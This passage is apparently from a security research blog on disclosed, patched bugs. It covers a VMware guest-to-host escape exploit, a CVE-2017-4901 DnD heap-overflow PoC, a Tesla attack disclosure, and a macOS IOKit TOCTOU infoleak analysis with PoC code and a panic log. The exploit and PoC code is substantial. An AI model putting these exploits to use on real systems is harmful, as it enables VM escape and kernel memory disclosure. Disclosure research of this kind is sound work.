                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || //RpcBase
                        low == 0x74d0 || //CpV4
                        low == 0x7630)   //DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141ULL); // %I64u expects a 64-bit argument
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);

    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340,
                base + 0xB87340};

            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);

            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        //check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);//fix dnd to callable prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        //host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation()) ? EXCEPTION_EXECUTE_HANDLER : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}
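The base-address calculation buried in infoleak() can be isolated for clarity. The sketch below reuses the constants from the exploit code (the three vtable low words and the 0x7a0000 offset), which are specific to the vmware-vmx build targeted at the time; the function name `vmx_base_from_leak` is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Returns the vmware-vmx image base if `leaked` looks like one of the
 * expected vtable pointers, or 0 otherwise. */
static uint64_t vmx_base_from_leak(uint64_t leaked) {
    uint64_t low = leaked & 0xFFFFu;
    if (low == 0x74A8u ||  /* RpcBase */
        low == 0x74D0u ||  /* CpV4 */
        low == 0x7630u) {  /* DnDV4 */
        /* Strip the low word, then subtract the vtable's page offset in the image. */
        return (leaked & ~(uint64_t)0xFFFF) - 0x7A0000u;
    }
    return 0;
}
```

Because ASLR on Windows keeps the low 16 bits of an address within a module fixed, matching on the low word is a cheap way to recognize a leaked vtable pointer among arbitrary heap data.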

CVE-2017-4901 DnDv3 HeapOverflow

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.
VMware Workstation and Fusion updates address out-of-bounds memory access vulnerability, www.vmware.com/security/advisories/VMSA-2017-0005.html

After VMware released 12.5.3, we continued auditing the DnD code and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known to almost every participant in the VMware category of Pwn2Own 2017. Here we present the PoC for this bug.

void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int*)(req3+n) = 3;
    *(int*)(req3+n+4) = 0;
    *(int*)(req3+n+8) = 0x100;
    *(int*)(req3+n+0xc) = 0;
    *(int*)(req3+n+0x10) = 0;
    // allocate buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n+0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int*)(req4+n) = 3;
    *(int*)(req4+n+4) = 0;
    *(int*)(req4+n+8) = 0x1000;
    *(int*)(req4+n+0xc) = 0x800;
    *(int*)(req4+n+0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n+0x14+i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n+0x14+0x800, NULL, NULL);
}
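
The two dnd.transport requests in the PoC differ only in the five 32-bit values written after the command string. A minimal sketch of a helper that builds such a request is shown here. The struct and its field names (type, seq_num, total_size, payload_size, offset) and the function name build_dnd_transport are assumptions made for illustration; the PoC itself only shows the raw values and the comments about a 0x100-byte buffer and a 0x800-byte payload.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Field names are assumptions; the PoC only writes five 32-bit values. */
struct dnd_hdr {
    uint32_t type;          /* 3 in both PoC requests */
    uint32_t seq_num;       /* 0 in both PoC requests (assumed meaning) */
    uint32_t total_size;    /* 0x100 in the first request, 0x1000 in the second */
    uint32_t payload_size;  /* 0 in the first request, 0x800 in the second */
    uint32_t offset;        /* 0 in both PoC requests (assumed meaning) */
};

/* Writes "dnd.transport " + header + payload into out.
 * Returns the request length, or 0 if it does not fit or payload is missing. */
size_t build_dnd_transport(uint8_t *out, size_t cap,
                           const struct dnd_hdr *hdr, const uint8_t *payload)
{
    static const char cmd[] = "dnd.transport ";
    size_t cmd_len = sizeof(cmd) - 1;
    size_t need = cmd_len + sizeof(*hdr) + hdr->payload_size;

    if (need > cap)
        return 0;
    if (hdr->payload_size != 0 && payload == NULL)
        return 0;
    memcpy(out, cmd, cmd_len);
    memcpy(out + cmd_len, hdr, sizeof(*hdr));   /* host byte order, as in the PoC */
    if (hdr->payload_size != 0)
        memcpy(out + cmd_len + sizeof(*hdr), payload, hdr->payload_size);
    return need;
}
```

With this helper, the first request would carry {3, 0, 0x100, 0, 0} and the second {3, 0, 0x1000, 0x800, 0} plus 0x800 bytes of 'A'; the returned length is what the PoC passes to RpcOut_SendOneRaw.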

Conclusions

In this article we presented several VMware bugs leading to guest-to-host virtual machine escape.
We hope to have demonstrated not only that VM breakouts are possible and real, but also that a determined attacker can achieve several of them, and with good reliability.
We feel that in our industry there is a misconception that untrusted software is safe to run as long as it runs inside a VM.
Think about the malware industry, which relies heavily on VMs for analysis, or the entire cloud, which basically runs on hypervisors.
A VM is certainly an additional protection layer that raises the bar for an attacker seeking full compromise, so adopting it is very good practice.
But we must not forget that it is essentially just another “layer of sandboxing” which can be bypassed or escaped.
So great care must be taken to secure this layer as well.

New Car Hacking Research: 2017, Remote Attack Tesla Motors Again

2017-07-27T13:22:42.000Z

Keen Lab discovered new security vulnerabilities in Tesla vehicles and built a full attack chain that achieves arbitrary remote control of the CAN bus and ECUs on Tesla vehicles running the latest firmware.

Several highlights for 2017 Tesla Research:

We realized a full attack chain, as we did in 2016, to achieve arbitrary remote control of the CAN bus and ECUs.
We discovered multiple 0-days in different modules. Keen Lab is currently working with Tesla and the related manufacturers on assigning CVE numbers to the vulnerabilities.
In September 2016 Tesla introduced a new security mechanism, “code signing”, which checks the signature of system firmware delivered to Tesla vehicles over the air (FOTA). Keen Lab bypassed this code signing.
The “Group lighting show of Model X” in our demonstration is technically arbitrary remote control of multiple ECUs at the same time. It shows Keen Lab’s research capability on the CAN bus and ECUs.

Keen Lab followed the “responsible disclosure” process and reported all security vulnerabilities and related exploits to Tesla. The Tesla Product Security Team has verified and confirmed all the bugs in our report. Security patches were developed and delivered to vehicles via FOTA in July. The reported issues affect multiple Tesla models. According to Tesla’s report, most active Tesla vehicles have been updated to the new, patched firmware via FOTA. We thank the Tesla Product Security Team for their quick response, quick fix and efficient patching via FOTA.

Reminder to Tesla car owners: please check whether your car is running firmware version 8.1 (17.26.0) or later. If not, please upgrade to the latest firmware to ensure that all the issues are fixed.

The video below demonstrates the impact of our remote attack vector. REMINDER: WHAT YOU ARE ABOUT TO SEE IN THIS VIDEO IS PERFORMED BY PROFESSIONAL RESEARCHERS, DO NOT TRY THIS AT HOME. We thank Tencent Auto for its contribution to publishing this demonstration.

Racing for everyone: descriptor describes TOCTOU in Apple's core

2017-01-09T07:07:42.000Z

This blog post is about a new type of vulnerability in IOKit that I discovered and submitted to Apple in 2016. A brief scan of macOS with an IDA script found at least four bugs, with three CVEs assigned (CVE-2016-7620/4/5); see https://support.apple.com/kb/HT207423. I was told afterwards that there were even more issues of this type in the iOS and OS X IOKit drivers, and fortunately Apple fixed those as well.

Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

kern_return_t
IOConnectCallMethod(
    mach_port_t      connection,        // In
    uint32_t         selector,          // In
    const uint64_t  *input,             // In
    uint32_t         inputCnt,          // In
    const void      *inputStruct,       // In
    size_t           inputStructCnt,    // In
    uint64_t        *output,            // Out
    uint32_t        *outputCnt,         // In/Out
    void            *outputStruct,      // Out
    size_t          *outputStructCntP)  // In/Out
{
//...
    if (inputStructCnt <= sizeof(io_struct_inband_t)) {
        inb_input      = (void *) inputStruct;
        inb_input_size = (mach_msg_type_number_t) inputStructCnt;
    }
    else {
        ool_input      = reinterpret_cast_mach_vm_address_t(inputStruct);
        ool_input_size = inputStructCnt;
    }
//...
        else if (size <= sizeof(io_struct_inband_t)) {
            inb_output      = outputStruct;
            inb_output_size = (mach_msg_type_number_t) size;
        }
        else {
            ool_output      = reinterpret_cast_mach_vm_address_t(outputStruct);
            ool_output_size = (mach_vm_size_t)    size;
        }
    }

    rtn = io_connect_method(connection,         selector,
                (uint64_t *) input, inputCnt,
                inb_input,          inb_input_size,
                ool_input,          ool_input_size,
                inb_output,         &inb_output_size,
                output,             outputCnt,
                ool_output,         &ool_output_size);
//...
    return rtn;
}

If inputStruct is larger than sizeof(io_struct_inband_t), the argument is cast to a mach_vm_address_t and passed out-of-line; otherwise it is passed inband as a plain pointer.

Is this one race-able? No? Is that one race-able?

A curious mind might ask: is there any way to modify this input after the call and turn it into a TOCTOU? Historical vulnerabilities focused on racing memory shared via IOConnectMapMemory, whose purpose is obvious from its name (see Pangu’s and Ian Beer’s research); however, these kinds of vulnerabilities have mostly been eliminated by now.

So eyes turn to these simple and naive IOKit arguments: are these benign little spirits race-able too?

Let’s see how these arguments are passed from userspace to kernel space.

In the MIG definitions and the generated code, different input types are dealt with in different ways.

routine io_connect_method(
        connection      : io_connect_t;
    in  selector        : uint32_t;

    in  scalar_input    : io_scalar_inband64_t;
    in  inband_input    : io_struct_inband_t;
    in  ool_input       : mach_vm_address_t;
    in  ool_input_size  : mach_vm_size_t;

    out inband_output   : io_struct_inband_t, CountInOut;
    out scalar_output   : io_scalar_inband64_t, CountInOut;
    in  ool_output      : mach_vm_address_t;
    inout ool_output_size   : mach_vm_size_t
);

The following code is generated:

/* Routine io_connect_method */
mig_external kern_return_t io_connect_method(
    mach_port_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size)
{
//...
    (void)memcpy((char *) InP->scalar_input, (const char *) scalar_input, 8 * scalar_inputCnt);
//...
    if (inband_inputCnt > 4096) {
        { return MIG_ARRAY_TOO_LARGE; }
    }
    (void)memcpy((char *) InP->inband_input, (const char *) inband_input, inband_inputCnt);
//...
    InP->ool_input = ool_input;
    InP->ool_input_size = ool_input_size;
//...

OK, it seems that scalar input and struct input of at most 4096 bytes are copied inband into the Mach message and then passed into kernel space. No way to race those.

However, struct input larger than 4096 bytes stays a mach_vm_address_t and is passed through untouched.
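
The routing decision described above fits in a few lines. This is only a sketch: the names INBAND_MAX, input_path and classify_struct_input are made up for illustration, and the 4096-byte limit is taken from the inband_inputCnt check in the generated MIG code rather than from the definition of io_struct_inband_t.

```c
#include <stddef.h>

/* Assumption: the inband limit is 4096 bytes, matching the
 * "inband_inputCnt > 4096" check in the generated MIG code. */
#define INBAND_MAX 4096u

enum input_path {
    INPUT_INBAND,   /* copied into the Mach message: not race-able */
    INPUT_OOL       /* passed as a userspace address: stays shared */
};

/* Mirrors the size test IOConnectCallMethod applies to inputStruct. */
enum input_path classify_struct_input(size_t input_struct_cnt)
{
    return input_struct_cnt <= INBAND_MAX ? INPUT_INBAND : INPUT_OOL;
}
```

Only inputs that take the INPUT_OOL path reach the kernel as a bare address, which is why the rest of the analysis concentrates on them.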

Now let’s dive into kernel space:

kern_return_t is_io_connect_method
(
    io_connect_t connection,
    uint32_t selector,
    io_scalar_inband64_t scalar_input,
    mach_msg_type_number_t scalar_inputCnt,
    io_struct_inband_t inband_input,
    mach_msg_type_number_t inband_inputCnt,
    mach_vm_address_t ool_input,
    mach_vm_size_t ool_input_size,
    io_struct_inband_t inband_output,
    mach_msg_type_number_t *inband_outputCnt,
    io_scalar_inband64_t scalar_output,
    mach_msg_type_number_t *scalar_outputCnt,
    mach_vm_address_t ool_output,
    mach_vm_size_t *ool_output_size
)
{
    CHECK( IOUserClient, connection, client );

    IOExternalMethodArguments args;
    IOReturn ret;
    IOMemoryDescriptor * inputMD  = 0;
    IOMemoryDescriptor * outputMD = 0;
//...
    args.scalarInput = scalar_input;
    args.scalarInputCount = scalar_inputCnt;
    args.structureInput = inband_input;
    args.structureInputSize = inband_inputCnt;

    if (ool_input)
        inputMD = IOMemoryDescriptor::withAddressRange(ool_input, ool_input_size,
                            kIODirectionOut, current_task());

    args.structureInputDescriptor = inputMD;
//...
    if (ool_output && ool_output_size)
    {
        outputMD = IOMemoryDescriptor::withAddressRange(ool_output, *ool_output_size,
                            kIODirectionIn, current_task());
//...
    return (ret);
}

It seems Apple and Linux take different approaches here. In the Linux kernel, incoming userspace content is usually copied into kernel-allocated memory using copy_from_user. The Apple kernel, however, directly creates a memory descriptor from the userspace address rather than making a copy.

So can we modify this memory content in userspace after it’s passed to kernel via IOKit call?

Surprisingly, the answer is yes!

This means that for an IOKit call, if the corresponding IOService accepts an input memory descriptor, the userspace program can alter the content while the IOService is processing it: no lock, no write protection. A juicy place for race conditions and TOCTOU (time-of-check to time-of-use) bugs :) After this bug was fixed I talked to security folks at Apple, and they said even they hadn’t realized that the descriptor-mapped memory is writable by userspace.

I quickly identified several potentially vulnerable patterns in IOReportUserClient, IOCommandQueue and IOSurface; one of them (CVE-2016-7624) is described below. There are far more patterns than that, so use your imagination :)

TOCTOU in IOCommandQueue can lead to information disclosure reachable from sandbox

There is a TOCTOU in IOAccelCommandQueue::submit_command_buffers. The function accepts either an inband struct or a structureInputDescriptor. Attacker-controlled data is passed into the function, and a value at a certain offset is used as a length. The length is validated, but because of the nature of memory descriptors the client can still change the value before it is actually used by modifying the mapped memory. This causes a TOCTOU that leads to information disclosure or possibly an out-of-bounds write.

Analysis

IOAccelCommandQueue::s_submit_command_buffers accepts user-supplied IOExternalMethodArguments. If a structureInputDescriptor backed by a userspace-mapped address is passed in, the function obtains an IOMemoryMap from the descriptor, takes its address and uses it. But nothing prevents userspace from modifying the content at that address, which leads to a TOCTOU.

__int64 __fastcall IOAccelCommandQueue::s_submit_command_buffers(IOAccelCommandQueue *this, __int64 a2, IOExternalMethodArguments *a3)
{
  IOExternalMethodArguments *v3; // r12@1
  IOAccelCommandQueue *v4; // r15@1
  unsigned __int64 inputdatalen; // rsi@1
  unsigned int v6; // ebx@1
  IOMemoryDescriptor *v7; // rdi@3
  __int64 v8; // r14@3
  __int64 inputdata; // rcx@5

  v3 = a3;
  v4 = this;
  inputdatalen = (unsigned int)a3->structureInputSize;
  v6 = -536870206;
  if ( inputdatalen >= 8
    && inputdatalen - 8 == 3
                         * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL) )
  {
    v7 = (IOMemoryDescriptor *)a3->structureInputDescriptor;
    v8 = 0LL;
    if ( v7 )
    {
      v8 = (__int64)v7->vtbl->__ZN18IOMemoryDescriptor3mapEj(v7, 4096LL);
      v6 = -536870200;
      if ( !v8 )
        return v6;
      inputdata = (*(__int64 (__fastcall **)(__int64))(*(_QWORD *)v8 + 280LL))(v8);
      LODWORD(inputdatalen) = v3->structureInputSize;
    }

We can see that at offset +4 a DWORD is retrieved as the length and checked against the total input length, using the same multiply-and-shift expression: (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

The length at this offset is then used again in submit_command_buffers. See the following code:

  if ( *((_QWORD *)this + 160) )
  {
    v5 = (IOAccelShared2 *)*((_QWORD *)this + 165);
    if ( v5 )
    {
      IOAccelShared2::processResourceDirtyCommands(v5);
      IOAccelCommandQueue::updatePriority((IOAccelCommandQueue *)v2);
      if ( *(_DWORD *)(input + 4) )
      {
        v6 = (unsigned __int64 *)(input + 24);
        v7 = 0LL;
        do
        {
          IOAccelCommandQueue::submitCommandBuffer(
            (IOAccelCommandQueue *)v2,
            *((_DWORD *)v6 - 4),//v6 based on input
            *((_DWORD *)v6 - 3),//based on input
            *(v6 - 1),//based on input
            *v6);//based on input
          ++v7;
          v6 += 3;
        }
        while ( v7 < *(unsigned int *)(input + 4) ); //NOTICE HERE
      }

Notice that in the line marked NOTICE HERE (line 23), *(input+4) is read again as the loop boundary. If the user passes in a descriptor, they can modify the value from userland after the check in s_submit_command_buffers has passed, causing the loop to go out of bounds.

In IOAccelCommandQueue::submitCommandBuffer, in the following statement:

    IOGraphicsAccelerator2::sendBlockFenceNotification(
      *((IOGraphicsAccelerator2 **)this + 166),
      (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
      data_from_input_add_24_minus_8,
      0LL,
      v13);
    result = IOGraphicsAccelerator2::sendBlockFenceNotification(
               *((IOGraphicsAccelerator2 **)this + 166),
               (unsigned __int64 *)(*((_QWORD *)this + 160) + 16LL),
               data_from_input_add_24,
               0LL,
               v13);

The memory content is sent back to userspace if a notification callback is installed. So if an attacker can arrange for sensitive memory to sit right after the mapped descriptor memory, the out-of-bounds read returns that content to userspace, leading to an infoleak.

The exploit steps are:

The userspace program mmaps a memory page and passes it as the IOKit call argument structureInputDescriptor.
s_submit_command_buffers validates that the value at +4 is consistent with the total length of the incoming structureInput.
submit_command_buffers iterates over the descriptor memory passed in from userspace, using the value at +4 as the loop bound. The memory content that is read is processed in submitCommandBuffer and sent back to userspace via the installed asyncNotificationPort.
The userspace program races to modify the value at offset +4, causing the loop to go out of bounds and leak adjacent memory in the kernel address space.
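
The check-then-use pattern in these steps can be simulated in plain userspace C. The sketch below is not driver code: the racing thread is replaced by a hypothetical hook that runs between the check and the use so that the outcome is deterministic, and all function names are made up. The second function shows a common driver-side mitigation (fetch the value once into private state); this is for contrast only and is not the fix Apple shipped.

```c
#include <stdint.h>
#include <stddef.h>

#define HDR_SIZE   8u    /* bytes before the first entry */
#define ENTRY_SIZE 24u   /* each entry is three 64-bit words in the decompiled loop */

/* Hypothetical stand-in for the racing userspace thread. */
typedef void (*race_hook)(volatile uint32_t *shared);

/* Vulnerable shape: shared[1] (the DWORD at +4) is read at check time and
 * read again as the loop bound. Returns entries walked, or -1 if rejected. */
long walk_double_fetch(volatile uint32_t *shared, size_t len, race_hook hook)
{
    if (len < HDR_SIZE || shared[1] != (len - HDR_SIZE) / ENTRY_SIZE)
        return -1;                              /* time of check */
    if (hook)
        hook(shared);                           /* attacker rewrites shared[1] */
    long walked = 0;
    for (uint32_t i = 0; i < shared[1]; ++i)    /* time of use: second fetch */
        ++walked;
    return walked;
}

/* Single-fetch shape: the count is copied once and never re-read. */
long walk_single_fetch(volatile uint32_t *shared, size_t len, race_hook hook)
{
    if (len < HDR_SIZE)
        return -1;
    uint32_t count = shared[1];                 /* the only fetch */
    if (count != (len - HDR_SIZE) / ENTRY_SIZE)
        return -1;
    if (hook)
        hook(shared);                           /* too late to matter */
    long walked = 0;
    for (uint32_t i = 0; i < count; ++i)
        ++walked;
    return walked;
}

/* Example hook: enlarges the count after validation. */
void bump_count(volatile uint32_t *shared)
{
    shared[1] = 0x1000;
}
```

With a 4088-byte buffer whose count field is 0xaa, walk_double_fetch with bump_count walks 0x1000 entries, far past the 170 that were validated, while walk_single_fetch still walks 0xaa.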

Notice that inputdatalen is first retrieved from structureInputSize, so we cannot directly use the IOConnectCallMethod API, because with that API structureInput and structureInputDescriptor cannot be passed at the same time.

Instead we directly call the private _io_connect_method function in the IOKit framework, which accepts structureInput and structureInputDescriptor at the same time.

POC code

POC code for these three vulns can all be found at https://github.com/flankerhqd/descriptor-describes-racing. Here is one simplified version:

volatile unsigned int secs = 10;
void modifystrcut()
{
    *((unsigned int*)(input+4)) = 0x7fffffff;
    printf("secs %x\n", secs);
}
//...
int main(int argc, const char * argv[]) {
    io_iterator_t iterator;
    //...
    getFunc();
    io_connect_t conn;
    io_service_t svc;
    //...
    IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IntelAccelerator"), &iterator);
    svc = IOIteratorNext(iterator);
    printf("%x %x\n", IOServiceOpen(svc, mach_task_self(), 9, &conn), conn);
    //...
    io_connect_t sharedconn;
    IOServiceOpen(svc, mach_task_self(), 6, &sharedconn);
    IOConnectAddClient(conn, sharedconn);
    //then set async ref
    ref = IONotificationPortCreate(kIOMasterPortDefault);
    port = IONotificationPortGetMachPort(ref);
    pthread_t rt;
    pthread_create(&rt, NULL, gaorunloop, NULL);

    io_async_ref64_t asyncRef;
    asyncRef[kIOAsyncCalloutFuncIndex] = callback;
    asyncRef[kIOAsyncCalloutRefconIndex] = NULL;
    //...
    const uint32_t outputcnt = 0;
    const size_t outputcnt64 = 0;
    IOConnectCallAsyncScalarMethod(conn, 0, port, asyncRef, 3, NULL, 0, NULL, &outputcnt);
    //...
    size_t i=0;
    input = dommap();
    {
        char* structinput = input;
        *((unsigned int*)(structinput+4)) = 0xaa;//the size is then used in for loop, possible to change it in descriptor?
        size_t outcnt = 0;
    }
    //...
    const size_t bufsize = 4088;
    char buf[bufsize];
    memset(buf, 'a', sizeof(buf));//fill exactly sizeof(buf) bytes
    size_t outcnt =0;
    *((unsigned int*)(buf+4)) = 0xaa;
    //...
    {
        pthread_t t;
        pthread_create(&t, NULL, modifystrcut, NULL);
        //...
        io_connect_method(
                      conn,
                      1,
                      NULL,//input
                      0,//inputCnt
                      buf,//inb_input
                      bufsize,//inb_input_size
                      reinterpret_cast_mach_vm_address_t(input),//ool_input
                      ool_size,//ool_input_size
                      buf,//inb_output
                      (mach_msg_type_number_t*)&outputcnt, //inb_output_size*
                      (uint64_t*)buf,//output
                      &outputcnt, //outputCnt
                      reinterpret_cast_mach_vm_address_t(buf), //ool_output
                      (mach_msg_type_number_t*)&outputcnt64//ool_output_size*
                      );
    }

The two key constants are 4088 and 0xaa; these two numbers satisfy the checks at

inputdatalen - 8 == 3 * (((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)(inputdatalen - 8) >> 64) >> 1) & 0x7FFFFFFFFFFFFFF8LL)

and

if ( *(_DWORD *)(inputdata + 4) == (unsigned int)((unsigned __int64)(0x0AAAAAAAAAAAAAAABLL * (unsigned __int128)((unsigned __int64)(unsigned int)inputdatalen - 8) >> 64) >> 4) )
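
To see why 4088 and 0xaa go together, it helps to read the multiply-and-shift as a compiler-generated division: taking the high 64 bits of x * 0xAAAAAAAAAAAAAAAB and shifting right by 1 gives x / 3, and shifting right by 4 gives x / 24. The sketch below restates both checks this way. The function names are invented for illustration, and unsigned __int128 is a GCC/Clang extension on 64-bit targets.

```c
#include <stdint.h>

/* High 64 bits of x * 0xAAAAAAAAAAAAAAAB, as in the decompiled expression. */
static uint64_t mulhi_magic(uint64_t x)
{
    return (uint64_t)(((unsigned __int128)0xAAAAAAAAAAAAAAABULL * x) >> 64);
}

/* First check: (len - 8) must be a whole number of 24-byte entries,
 * because (x / 3) rounded down to a multiple of 8, times 3, must equal x. */
int length_is_valid(uint64_t len)
{
    return len >= 8 &&
           len - 8 == 3 * ((mulhi_magic(len - 8) >> 1) & 0x7FFFFFFFFFFFFFF8ULL);
}

/* Second check: the DWORD at +4 must equal this value, i.e. (len - 8) / 24.
 * Callers are expected to pass a len that length_is_valid() accepted. */
uint32_t expected_count(uint64_t len)
{
    return (uint32_t)(mulhi_magic(len - 8) >> 4);
}
```

For len = 4088 the payload is 4080 bytes, which is exactly 170 entries of 24 bytes, and 170 is 0xaa.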

Panic Report

panic(cpu 0 caller 0xffffff801dfce5fa): Kernel trap at 0xffffff7fa039d2a4, type 14=page fault, registers:
CR0: 0x0000000080010033, CR2: 0xffffff812735f000, CR3: 0x000000000ce100ab, CR4: 0x00000000001627e0
RAX: 0x000000007fffffff, RBX: 0xffffff812735f008, RCX: 0x0000000000000000, RDX: 0x0000000000000000
RSP: 0xffffff81276d3b60, RBP: 0xffffff81276d3b80, RSI: 0x0000000000000000, RDI: 0xffffff802fcaef80
R8:  0x00000000ffffffff, R9:  0x0000000000000002, R10: 0x0000000000000007, R11: 0x0000000000007fff
R12: 0xffffff8031862800, R13: 0xaaaaaaaaaaaaaaab, R14: 0xffffff812735e000, R15: 0x00000000000000aa
RFL: 0x0000000000010293, RIP: 0xffffff7fa039d2a4, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0xffffff812735f000, Error code: 0x0000000000000000, Fault CPU: 0x0, PL: 0
Backtrace (CPU 0), Frame : Return Address
0xffffff81276d37f0 : 0xffffff801dedab12 mach_kernel : _panic + 0xe2
0xffffff81276d3870 : 0xffffff801dfce5fa mach_kernel : _kernel_trap + 0x91a
0xffffff81276d3a50 : 0xffffff801dfec463 mach_kernel : _return_from_trap + 0xe3
0xffffff81276d3a70 : 0xffffff7fa039d2a4 com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue22submit_command_buffersEPK29IOAccelCommandQueueSubmitArgs + 0x8e
0xffffff81276d3b80 : 0xffffff7fa039c92c com.apple.iokit.IOAcceleratorFamily2 : __ZN19IOAccelCommandQueue24s_submit_command_buffersEPS_PvP25IOExternalMethodArguments + 0xba
0xffffff81276d3bc0 : 0xffffff7fa03f6db5 com.apple.driver.AppleIntelHD5000Graphics : __ZN19IGAccelCommandQueue14externalMethodEjP25IOExternalMethodArgumentsP24IOExternalMethodDispatchP8OSObjectPv + 0x19
0xffffff81276d3be0 : 0xffffff801e4dfa07 mach_kernel : _is_io_connect_method + 0x1e7
0xffffff81276d3d20 : 0xffffff801df97eb0 mach_kernel : _iokit_server + 0x5bd0
0xffffff81276d3e30 : 0xffffff801dedf283 mach_kernel : _ipc_kobject_server + 0x103
0xffffff81276d3e60 : 0xffffff801dec28b8 mach_kernel : _ipc_kmsg_send + 0xb8
0xffffff81276d3ea0 : 0xffffff801ded2665 mach_kernel : _mach_msg_overwrite_trap + 0xc5
0xffffff81276d3f10 : 0xffffff801dfb8dca mach_kernel : _mach_call_munger64 + 0x19a
0xffffff81276d3fb0 : 0xffffff801dfecc86 mach_kernel : _hndl_mach_scall64 + 0x16
      Kernel Extensions in backtrace:
         com.apple.iokit.IOAcceleratorFamily2(205.10)[949D9C27-0635-3EE4-B836-373871BC6247]@0xffffff7fa0374000->0xffffff7fa03dffff
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
         com.apple.driver.AppleIntelHD5000Graphics(10.1.4)[E5BC31AC-4714-3A57-9CDC-3FF346D811C5]@0xffffff7fa03ee000->0xffffff7fa047afff
            dependency: com.apple.iokit.IOSurface(108.2.1)[B5ADE17A-36A5-3231-B066-7242441F7638]@0xffffff7f9f0fb000
            dependency: com.apple.iokit.IOPCIFamily(2.9)[D8216D61-5209-3B0C-866D-7D8B3C5F33FF]@0xffffff7f9e72c000
            dependency: com.apple.iokit.IOGraphicsFamily(2.4.1)[172C2960-EDF5-382D-80A5-C13E97D74880]@0xffffff7f9f232000
